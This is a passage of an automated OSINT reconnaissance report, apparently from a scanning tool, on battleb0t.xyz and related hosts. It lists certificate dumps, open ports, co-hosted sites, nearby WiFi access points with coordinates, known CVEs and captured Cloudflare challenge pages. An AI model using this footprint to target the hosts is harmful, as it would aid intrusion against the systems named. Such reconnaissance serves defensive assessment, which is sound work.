b5:9a:b3:86:c9:5c:88:b7:8c:c8:3d:30:64:42:7f:
87:9a:b5
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:A0:A8:B9:3F:90:D7:08:DA:7E:1F:47:83:D5:88:5D:68:C9:9D:69
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:vscode.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
14:78:89:b1:8a:61:96:a7:ed:ed:6f:79:f8:42:dc:18:11:94:
04:56:a5:c3:80:ee:8b:7d:e8:18:f9:55:d6:f7:cb:22:5f:bd:
89:01:c5:e6:7b:ae:45:c0:ec:56:e5:c2:7d:d1:3d:a3:bc:46:
f2:97:64:eb:52:63:74:0b:62:2b:cb:f6:53:e6:8f:96:8f:78:
0e:79:d9:d9:06:eb:13:01:f3:a6:5e:da:6d:b3:53:66:1e:0a:
11:4d:63:47:ed:42:22:0b:9f:52:2c:e1:d2:d2:7f:fc:df:0d:
ec:bd:d7:45:bd:1e:e8:50:83:90:59:00:5f:f9:13:d7:1e:8d:
09:80:4c:9f:8f:d6:56:72:42:52:f1:4f:c9:f7:1a:c8:c6:d7:
cc:26:6b:04:0a:fd:ec:68:27:dd:6a:5c:a7:6a:ec:f5:60:49:
d4:f0:de:24:04:3b:b8:7c:8c:60:f2:a3:cc:8f:46:9a:ab:ff:
28:cf:36:42:ed:1a:c4:05:86:b0:92:1e:51:f1:3e:c1:54:5f:
a0:77:3a:81:f2:18:31:c6:f3:7b:7d:43:34:56:f8:32:e5:fc:
0e:7a:dd:40:27:84:9e:db:87:8b:98:6d:7c:97:c3:31:5e:a7:
d9:88:62:36:ed:94:00:e5:a5:27:77:53:25:24:2b:3e:9f:cd:
c9:43:c1:d8
| battleb0t.xyz |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | WLAN2 (Net ID: 00:02:44:AF:56:1C) | 50.1188, 8.6843 |
| 2023-05-12 03:32:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.7:80 | 188.114.97.0/24 |
| 2023-05-12 03:24:47 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | Chicago, Illinois, 60666, United States, North America |
| 2023-05-12 03:13:00 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-0-256.github.io]
https://www.openphish.com/feed.txt | 0-0-256.github.io |
| 2023-05-12 02:44:21 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3030::ac43:a8fc | nwapi2.battleb0t.xyz |
| 2023-05-12 02:44:18 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3037::6815:470e | nwapi.battleb0t.xyz |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.109): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:09:02 | Vulnerability - CVE Medium | Yes | Tool - Retire.js | 0 | 0 | 4 | 0 | None | CVE-2020-11023
https://nvd.nist.gov/vuln/detail/CVE-2020-11023
Score: 6.1
Description: In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. | http://code.jquery.com/jquery-3.2.1.js |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | grasshopper2 (Net ID: 00:01:38:5A:88:28) | 37.7813933,-122.3918002 |
| 2023-05-12 02:59:53 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | nwapi2.battleb0t.xyz |
| 2023-05-12 02:46:49 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 35.229.48.116 |
| 2023-05-12 02:52:43 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:8d:d7:e0:05:18:38:a5:db:8a:48:64:f2:68:9a:98:22:c8
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 26 02:43:31 2023 GMT
Not After : Jul 25 02:43:30 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz, DNS:www.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Apr 26 03:43:31.388 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:43:38:D1:BA:46:EB:FB:AE:E5:0E:F5:96:
0C:2E:94:E5:49:45:23:64:6A:0D:BD:FC:87:A8:B8:00:
87:FD:24:62:02:20:75:87:54:4A:DF:64:4F:88:2E:B1:
25:57:3C:E7:3A:E0:19:3B:72:E0:C9:1A:87:B9:BB:3F:
35:51:E8:55:8F:82
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 26 03:43:31.409 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:5D:9E:62:37:CB:DB:77:1F:86:0C:C3:56:
8B:76:28:CE:A6:09:34:6A:3E:14:48:88:F6:21:96:4B:
D9:19:A8:EE:02:21:00:BC:CD:90:3B:08:38:44:A5:BB:
D6:38:35:73:D2:AD:F4:37:33:C9:DB:0D:66:F0:E9:9B:
ED:6A:44:1F:1B:F5:8E
Signature Algorithm: sha256WithRSAEncryption
7c:fa:bc:17:47:a7:e5:00:0d:95:46:f6:aa:b8:5c:00:e2:ec:
d7:d1:7a:8b:68:b6:74:b4:92:6d:3d:5e:34:79:68:36:4b:b1:
22:bc:39:10:53:ed:b5:6d:cb:32:be:a6:64:84:36:56:88:b4:
46:53:a9:13:77:42:0f:15:bd:f9:cb:e5:28:5d:fb:7e:a2:45:
2c:88:d0:5e:f0:2b:7e:c6:76:b9:0b:22:71:21:a1:7c:97:5c:
3a:e6:c7:51:0e:74:ba:87:b5:20:a9:b3:67:69:9c:c8:fc:3e:
a3:b5:ad:ee:73:7a:3e:e4:18:0a:93:40:47:fa:a9:04:04:e1:
f7:88:c4:73:97:3f:0c:9b:41:a3:36:f3:ec:33:03:ab:0c:30:
00:c0:20:bd:7a:4b:9a:0b:2b:5b:6d:f2:ba:7f:cc:e9:7b:ea:
fb:92:46:62:0b:ad:ee:b0:ba:89:ac:82:3a:17:07:50:53:81:
b3:41:01:ce:5c:08:dd:10:1b:6c:39:d6:14:34:c6:10:a8:c1:
d6:c2:f7:02:f7:45:91:38:08:18:a2:cd:a4:11:ec:4f:45:cb:
9e:27:ab:1e:0d:3e:e8:66:62:38:57:e6:40:15:8a:71:ee:e2:
dc:77:56:dc:8b:57:bb:4b:a9:03:f5:23:c6:cf:0a:e7:07:60:
58:ae:4b:bd
| battleb0t.xyz |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | art_vacation2.4 (Net ID: 00:01:9F:30:06:78) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2083 | 172.67.135.9 |
| 2023-05-12 03:01:14 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.130): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/kappi_2.png | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:46:01 | Physical Coordinates | No | AbstractAPI | 93 | 0 | 3 | 0 | None | 32.8608, -79.9746 | 104.196.30.220 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomF390F8 (Net ID: 00:0C:F6:F3:90:F8) | 50.8897, 6.0563 |
| 2023-05-12 02:44:07 | Internet Name | No | CertSpotter | 18 | 0 | 1 | 0 | None | oldfluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:09:38 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 107.48.229.35.bc.googleusercontent.com | 35.229.48.107 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | nocable (Net ID: 00:04:5A:E4:CE:AD) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:06 | URL (Form) | No | Page Information | 0 | 0 | 5 | 0 | None | https://ayhu.xyz/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f603759cec44a')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="VxcMRN.Povw0Dqbul8wSiWYYVjQ65KTx3XK5wkMYn5s-1683860053-0-ARNnaczlk3lhWY6ESpfReTjviWNfe6-W-F4EYUMujv5K8wYIHcmyGNVxCdUrRWsobOaE65E16LH7Z5A8l3JcOOwM40OukBYU_NTnKQTXBbuAPfHcavNAVkFXDNA4yBYP_F-doeuxJ1iDDtJRrmlmohTnm9Zwgu_y8a0NK2hiUe5yMvTqp63OLXzd1V9ueCyVeeK1caOtPi7xaty2vJtyZb-cIX-pXe1HjTUlpS2SBgDHLt9Z2nGU34h6kZ0-LrtNlJwHFMEUfGQT7Cu-pfqrhaBF1Rf57tLrkAcE4ToZFW0ZJ0AzVaQzLYE6ZtSIvjdhsInZ4x-0ac4WkaSnH9qLZC0frRaKCRbP1YE5yAsA_V_rAzDvledqs23zFkADyA1JndB-r5YTwGkwDl-BxZREbNktpruk72pVubcgN5obrf6JxTrQq7YBfyWH0u231TmHhalG3kCxQTdf9BBK1RtcvNhrrH01RN3jUXWOknSbzfs0xXZvpHYZ1mrWn-Ojnk9ZjOu2ygM5UtHSoZUS6y_CjRifM_gopebOwo_cedROZOf9quaaEku8SOVh2-a-u3HQqhJrHKvyqASEjXgOG-POuVge4L6xHx2SHahOESPnWqqKrSn9BYMIGELPd8-r-1tIAXEFuooehRGS_FYNDjqh6omsTcRWSr06JGoopCVsOBkATKY4nwfmOjHwATatO_bzDcPIKUDDZxN4trvvcVPNVoHO7Bdkn5nD4MlhG7ULR5m8BGChjHXk7lMQgvxBm1SZz89qexKer_mB3ITW_Ckfp4tPj4-YUwZkcw1lp1dwi32IJwgxwAEQrcGYo7Dftq8CYuStupr8lXKN_XUjGqTozvnpHPRsKR3mpnU05jAAbQN-wTNmylPeMG1Bx9YvJ8-oBs6FOj2g79NCurzx8d8F26PjaGqr-vtP8UKYeQxLAnNdd4Vl3r7Sxgy5_U4ONoKkZLnzYO166hvNojFJrl5f4tJq3L8oaK1eV5U-xpdOk_jlFbI7ZzjrEUv9fZQsj5GaeDY02cHxOh7Nt2nNuGIpJ43yd7IG1NCu_ks7x5I0kfXv5MRuTfiROKF9xzm5F_CKasB2amUWk6rZYcXTrxdif9TD5Sx62vXZQpsnSXx8a6qRdl0hIJb_vmia5qIkaGS9V0c3xjS-IDsjcMXU8HgYzlCX19Zu4ALj-qepP0KcZOXiHhiswQ6RmzSNTHY19R5ZletASbYV_KRC2PP48Hz8WCb-SWTTkcwOaIfpq0-9SsU16FZzuVHDtQR9HgY0pbLMzaxY0s1xIpwF0xudNUa9SsK7hj88CJhBWAgyl0DKCHjlEvVNsM3bMb76uUbrGBKt7Hry85yQS5UEcYp6GIRihakXwCelMLh9b6mQeb34LGhQRPvlmLc3f7j1216yXCSaBd223eCCMmrLoB2g3nLwqwrk_PW2t_XaPAxAsSOOJKzId4VjA2dn6CqsOQIQ1btvcUPfq3OsFea8XgUx2qTK18l8oqMYjxkPX_FOwTDrD8XvSUg990Ur0PezzJ7ZjQhXW2g96qU5HlxCcEgvTZ1Oj8VsRG6KYZKs3liq65P7yZ1Xq0PuWGs5ZH1HZuwe_EUK0ctlgYcA2TZqiqR97ljhOugKeylE_8hYvCH-_EfG3w8eyicUcZHEEbELHsNXehd76Tx3s2-ebSEw5k9zImyOFTenD_lgPbpq7QTz7xoj2el_vnfxew2WRomnN2o-3wrcdpxXZbyRqTVEwh9mt5ldOWHagonTAv_Q_hf6-IdMAwmmBbSh1Hcp5U00qxCfbSDlsw6TbCjryraM_n5MuyIQ3ROmpzau0nYDihwg55Yfm_maTyXQn3EfPcgCTbGbUA-S1IM4kEvznOEUMKan7limYnMnSACdDa6YllLFkTxfyt9PIWPkMFkg4rul1WrPg6PbIgC6s9asfdQz_qx66otvL3jKY2qeghrw_6pmQyfsLCIHyZFw1XaoIueMg-cFKFmIkcBABdWmDDrGq0ut54mYbYK3SFGC_bIHhtVHYt9KTDDqI94HFGgN1Tmq0OS0w3l63uBrjPR2ghPB-fwrkk0mrJ7qhhXURTs1sofuhT9GcdvnMZ1lpgzcElp3IhKAYa_lNxP8ZMf4Q_-TfeYlm0PHPqWivHEqU3GArEQlC_hJ27J0JdZxbF8RZT_qsP9FxBGCfGjgHhGcEmTtiLHMzioIBblPCJ2MJyW1yepTP1gLGj1XQw8vPq1sTASJgCcwQdtLYK1gBygsKJ6y9hq73XXqB7BxmSRGE1412ZH9kqHGFcsBJvpgdfjdZDEcUAbc7eHlE_pUs5mqrXq697Qb125fekHxboBa8kmPIcPQ2ynUBwAN74KYjxXYEmrozv8dkXJqol4LZcUANpwiA11Em8xrLpc2lbtTgwaNEHGyTh_5AUbuVj2YXAm8gMv0JlcPNtTwFxCdA8SE7rXhlJ4zCoy8DSlgGYlbvZ8ijwcet19cfaphrxuan5NDwsNqQSGBQBD2ZBY7HKWcOtfFA0IzjpULqXe_VhCzD0_t3-f5YJ6XZO21">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '16187',
cRay: '7c5f603759cec44a',
cHash: '5c1bdda96dc3363',
cUPMDTk: "\/?__cf_chl_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'HgohT/b1OM4tsUSGEPixuGnvvV+8jkzKLyX45HU4WdoKt1CyoXgioQGLmYcV9DPAxym7ohL+qPU6akoz/3Kv4jDE5qiLpt0g690Z1V0G6KGqGHPkesBGIYJOSkTiujqDpcxocLCBQ79XH7kLAk8OVa7j2xuxhAkf7tykvodsDRO92HgFm6rNoo9Cc4pq9Hw23quQ/Ag/Dw7fHCOPwdkWoIXGKhVsGwr+1oSvb+i62Ffqr2C/t8TudQSZP04EqcjtlKB4l31gRzqm6aULKZZKHQH5dhkngvCigCKNwW3hn9AmxEaT7NKkPj96+xDmNbHesoN2ACk9cb3W/d0YPCDVKR1HT4e51TpStG90quS33mPQQRwHkie3Xs9LUnGj5sG8Duv0tFosQZ0d2HZZW4zbksxXdaP8TmTByfSbYAcfyuU4CzRSX+Y5Rm9J03m+/gTMFWf25epClffMJPvWQuuF8+FuZwLDOXqs2UqxSUCSOXQCyg20Uk8QGVhEnW7SZrLI6C+LyvwhLlehehPxzaKSJs+0ftOeZ0U1P+CWNJ72yzyn1vk/bmC6oIk8nhtMSrxM',
t: 'MTY4Mzg2MDA1My42NjAwMDA=',
m: 'lfsFj6DGCrI2vGPf6BjuX9qKC3b3WJbZzI/myE7y0Ig=',
i1: 'Gu/vYOwR5DI39saTFLv/iA==',
i2: 'jBLnZ6zLXxRsowEZI/3brw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f603759cec44a');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f603759cec44a';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:18:06 | URL (Form) | No | Page Information | 0 | 0 | 4 | 0 | None | https://ayhu.xyz/?__cf_chl_f_tk=tLjY4MFl6PFRYsxJBRXXPqgMr4VsmLm23dP5uGlU768-1683860053-0-gaNycGzNCiU | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6036feab195d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="xHEPK.9yJ4uMnlaQxqQ03K5Csvr7WqmdHv5Obe9KwF8-1683860053-0-AVLFWFwz5cW9coePC-vcYYHeZXoVyZvPTnO5FSb69_py4IiBnIT69jsbDrQcjp17Zdx1pnQSJS5VK5u2qIZwYpKNdgBE5WortG78wVuw6xpL5WYKY8Pci1GRr-7IBheF2wnVhBXoAAbVv_kvF_G81MlD02OBybPgpztHUD8TsNxjUjxn5wbC4eO6XMoHSPC4tPjeAbdNC_mEhVDvKltWOjEKs7cQGG73dOqgzgZ5u0yyPTVVyh672vGUJchUE-7DlMtIc30cGk9vDedhhqnCEm6pQHqEqKn7E1c0_xe56xpqCOyx0gVIxxZL8ZolJaAY4W4DtMmEP6W2tHpS_rYvBDI9fm43yWOoTbxEvpOBUd21ETXlvv9NENQqsCUvjbm4kjTEkCkt9i7ao6sYMKBDIKOrBrqKSvX_CT_w9eydgmcnRxeGAnGPZ1UUlMCuPuHg11UNYHIqPBTtKLbqJ0CVo0se3b48fGi-sK8cLCpgZLWb2fRokqIeBAyscADBAfixig610ec8NyTnlho4fWsEuVJ8IH0YuFSDI5qB-p_hHDFAgQ4e2o5glLWVxkylixix8LPq3AjtUqJZW7z32u6RcNlBfPCJCrP_P-wzAtCmBv9wwLgJM8s28Fc0U3NqhEI7UzCd5r2rd1L9dZdXgwaESjOHBhuzibRb747KWauMhNoTHcDBBW-Cplvyyky4fhJh4codwoIMSFuB2e8vqSriOeMyuMhff86CdrTUwmJ-MpOwS5b3SzLp4WsUmqgXo5R_Ptn_13EQTYvgg_fn9wQYMVvNul0EzUw-m0dzAaXiayW9ZQRIKrGrxHaH77vlgDYfon_mV1EHNo0mYKenjF4lATYUDXOdsHJGDEb-aoyHMedXT2xjfifF75YrCt7aKEBajKaabeBOm93QKGtGLkUbhjuxR1Cv3fMl-a8Mcq-sqIzDY7Ofms_NojFVCky1MxilEB-pECoh_3dTQi7RdzrUTwf2cZR9T8D8U2K3Gvk8riLAICiz8kZstCExyU1gQxK_8IKsvToQ9RDrd9y9LVAX9qYv3TfadD1EkNEsFVChUuXBIn1vLV2P2GOPSzKbMN6zXhMlaXjRniTwtw6d8mrDXwAGH5ieemrcUb3FjxXespiPiaHaem6NlgnFXh6fqC6miAGPTygfZ8E84F8EVSFKovIkpjZZLkzg9smKqoObMwmWAc8hXyTmDTP1LoHTnasWw3kR_c4rubMdm-bM_qzcdotudBYUrTeL52K6MUKh8U0LXxV1ssRlYQtn51j2ZPTCT_4njX0UJZi7Aqe8bZOIi6YaJ6JVsLLVQlGwMIkxweehKTweGkzepoKrlA3vvzsnIuw6hwdTbMC1ff1nqZDuEXn1iUtY0QVWk3AiHWDwvflyRUhJFVQ_1RWCY6QxNbtBWuOs4Gsp4MKA65Y2bcGJNUQ61JSZsl8YoM493x6bgQq2c1ARXqI8Z_BprKNhAkkBaHzNAZnBx2sKG-aiygeREJS_Y-EXoEZkRsbQX02jydwcJZ3mjFQKdYrYE5cpUbTynwFh1r8orCm-Lgkh_khmNL7q7VDaHkkpQxyvlai7E7fXqkM8fGYOO32gd0hDiIlm85y2e8PdcZwTHglcg5WuEl3dz67kdyLqQrK_w0NhcEVoQlt-w-zjK_ug7gJVFCqVZy6o3CJv3Lkws4Pg2ePLly9U4qZNVRt3zz5hcKoCs-Pa1ZZzJ_Qzb2gSMP3u4cNDexag1H59HlUfcR7rjMJpsPYzqNpSQW3aa4RjeYciW4G4IbxfKJhCeUuFM4E4frBI_2OUYka-3R16-e5B-3ARb0HzAH7oGbA0ldmTnvfk1irgRMe8Dly0jpz5UNRE52UktWtSquB5QC1854VbxxgX4hhaW-nxmTCdOLafGYF1vg8rF-8NC1_FbTKMqIVsNKBWX0k0kJqiJjLCwjxEgXQ0Ze8manGpGGX8Y1qPfnNzHc2wFXLAoenNI_c9mp5k_TulxRQaJau67nLCYZqdFCfQ3OMpvtX4xDex5PrZ9T6mJUZ1nmSTAUixBLPwpRedqy1s01H2wlDBkSOhsj3ve3tA6H7ilQqtLQdfAuHK0_eW1Lnq3yDEyuzONZ1kc6hBMbhcyIePtyej1WeNa25rCw6imHPfgLzKSCX7sag3MiyXZyiVPtZsVrR333h3qptvAltAf6opML25pqpe_uKUHyc688RAlp_EgHCq-Gbx-iN5q2hY5Ny4xRPFJdCIjbFhNtGVw4MmWaJvAiePWPHqtweVVadLDMPlJCf3alqy71aqsxQI2WCWYRD_4Slgey6lOkSSsS-VG0B1_pBFsI7Qoqg4mLVGYQxVgLA66wEWyPhSdzuYryBNRXVwsWkB269be5JcqZIZNgC1b12-boaqHNSrCKMj83nOOm100RSF9-42ajHgNdPc9977LoOsIdA4wiwXyaum_ok5aRH8NPa5DUgCLteaEnABaI691YwS3Yv94Jp3MSd41yoh45wgGe42SPtQxw">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '8897',
cRay: '7c5f6036feab195d',
cHash: '461a186bf737deb',
cUPMDTk: "\/?__cf_chl_tk=kwBAgL0pzuFjxM6EaWUvVvfmBnOG2dt8365xKG72N9g-1683860053-0-gaNycGzNCfs",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
